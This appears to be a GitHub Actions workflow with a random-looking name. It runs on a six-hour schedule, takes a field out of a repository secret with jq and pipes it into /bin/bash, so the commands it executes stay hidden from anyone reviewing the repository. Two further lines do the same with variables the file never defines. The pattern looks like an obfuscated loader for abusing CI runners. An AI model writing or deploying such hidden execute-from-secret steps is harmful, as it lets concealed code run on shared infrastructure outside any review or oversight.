name: duanyanyu2233

on:
  workflow_dispatch:
  schedule:
    - cron: '30 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: duanyanyu2233
        env:
          f4: ${{ secrets.f4 }}
        run: |
          echo $f4 | jq -r .z662 | /bin/bash
          echo $hafso6010 | jq -r .gi90840 | /bin/bash
          echo $vev9448 | jq -r .lomxo3 | /bin/bash

